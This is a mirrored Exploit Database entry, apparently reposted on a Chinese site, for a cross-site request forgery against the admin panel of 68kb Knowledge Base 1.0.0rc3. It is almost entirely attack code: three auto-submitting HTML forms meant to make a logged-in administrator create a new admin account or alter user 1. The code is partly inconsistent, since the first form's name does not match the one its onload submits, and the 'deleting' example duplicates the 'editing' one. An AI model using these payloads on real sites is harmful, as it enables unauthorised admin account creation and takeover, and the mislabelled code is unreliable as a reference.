68kb 68KB Base 1.0.0rc3 – Cross-Site Request Forgery (Admin)

• Exploit Database
• 123 阅读

• 作者： Jelmer de Hen
  日期： 2010-04-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12021/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

  Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF Date: 2010-04-02 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip Version: v1.0.0rc3   <html> <body onload="document.forms["edit"].submit()"> <form name="create" method="post" action="http://<server>/index.php/admin/users/add"> <input type=hidden name="username" value="JohnDoe"> <input type=hidden name="email" value="email"> <input type=hidden name="level" value="1"> <input type=hidden name="password" value="password"> <input type=hidden name="passconf" value="password"> </form> </body> </html>   Example of deleting an account:   <html> <body onload="document.forms["edit"].submit()"> <form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1"> <input type=hidden name="username" value="JohnDoe"> <input type=hidden name="email" value="email"> <input type=hidden name="level" value="1"> <input type=hidden name="password" value="password"> <input type=hidden name="passconf" value="password"> <input type=hidden name="id" value="1"> </form> </body> </html>   Example of editing:   <html> <body onload="document.forms["edit"].submit()"> <form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1"> <input type=hidden name="username" value="JohnDoe"> <input type=hidden name="email" value="email"> <input type=hidden name="level" value="1"> <input type=hidden name="password" value="password"> <input type=hidden name="passconf" value="password"> <input type=hidden name="id" value="1"> </form> </body> </html>